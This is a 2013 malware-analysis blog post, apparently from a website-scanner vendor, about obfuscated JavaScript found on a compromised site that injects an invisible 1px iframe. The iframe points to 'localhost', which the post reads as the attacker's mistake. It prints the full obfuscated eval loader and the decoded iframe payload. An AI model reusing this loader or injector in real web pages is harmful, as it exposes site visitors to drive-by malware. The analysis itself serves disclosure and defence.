Thursday, August 15, 2013

Web Hacker's Bug?

Website with malicious obfuscated JavaScript that injects hidden iframe to 'localhost'

Background

Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user and which downloads content from remote malware distributor.

Website is blacklisted by Google and was seen distributing malware including 1 exploit.

When analyzing this detection to our surprise we noticed that the actual redirect URL source is 'localhost'. It looks like in this case, before the injection hacker tested the code on his local machine and uploaded it to compromised server AS IS instead of changing "localhost" to real URL. Hackers have bugs too, one might guess. We decided that it worth posting and might put a smile upon reader's face.

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).


Website malware scanner report

Submission date: Thu Aug 8 11:39:31 2013
Infected website's files: 1
Website malware scan report link: Sitescan report link

Quttera website malware scanner.
Quttera website malware scanner.






Threat dump:

Quttera website malware scanner. Malicious JavaScript detected on scanned website
Quttera website malware scanner. Malicious JavaScript detected on scanned website





Malware entry details

Beautified script

  1. asq = function () {
  2.     return n[i];
  3. };
  4. ww = window;
  5. ss = String.fromCharCode;
  6. try {
  7.     document.body = ~1
  8. } catch (qwrbtwt) {
  9.     zz = 12 * 2 + 1 + 1;
  10.     whwej = 12;
  11. } {
  12.     try {
  13.         whwej = ~2;
  14.     } catch (agdsg) {
  15.         whwej = 0;
  16.     }
  17.     if (whwej) {
  18.         try {
  19.             document.body++;
  20.         } catch (bawetawe) {
  21.             if (ww.document) {
  22.                 n ="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x68,0x66,0x79,0x66,0x71,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x73,0x64,0x21,0x3e,0x21,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x6d,0x70,0x64,0x62,0x6d,0x69,0x70,0x74,0x75,0x30,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x21,0x3e,0x21,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x63,0x70,0x73,0x65,0x66,0x73,0x21,0x3e,0x21,0x28,0x31,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x69,0x66,0x6a,0x68,0x69,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x78,0x6a,0x65,0x75,0x69,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x6a,0x67,0x21,0x29,0x22,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x68,0x66,0x79,0x66,0x71,0x28,0x2a,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x28,0x3d,0x65,0x6a,0x77,0x21,0x6a,0x65,0x3e,0x5d,0x28,0x68,0x66,0x79,0x66,0x71,0x5d,0x28,0x3f,0x3d,0x30,0x65,0x6a,0x77,0x3f,0x28,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x68,0x66,0x79,0x66,0x71,0x28,0x2a,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x68,0x66,0x79,0x66,0x71,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7e,0xe,0xb,0x7e,0x2a,0x29,0x2a,0x3c,0xe,0xb".split(",");
  23.                 h = 2;
  24.                 s = "";
  25.                 for (= 0; i - 481 != 0; i++) {
  26.                     k = i;
  27.                     s = s.concat(ss(eval(asq()) - 1));
  28.                 }
  29.                 z = s;
  30.                 eval("" + s);
  31.             }
  32.         }
  33.     }
  34. }

Malicious payload

Decoded payload injects hidden malicious iframe to 'localhost'

  1. (function () {
  2.  
  3.     var gexep = document.createElement('iframe');
  4.     gexep.src = 'http://localhost/';
  5.     gexep.style.position = 'absolute';
  6.     gexep.style.border = '0';
  7.  
  8.     gexep.style.height = '1px';
  9.  
  10.     gexep.style.width = '1px';
  11.  
  12.     gexep.style.left = '1px';
  13.  
  14.     gexep.style.top = '1px';
  15.  
  16.  
  17.  
  18.     if (!document.getElementById('gexep')) {
  19.  
  20.         document.write('<div id=\'gexep\'></div>');
  21.  
  22.         document.getElementById('gexep').appendChild(gexep);
  23.  
  24.     }
  25.  
  26. })();


Blacklisting status

Website is Blacklisted by Google Safe Browsing

Blacklisted by Google



Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.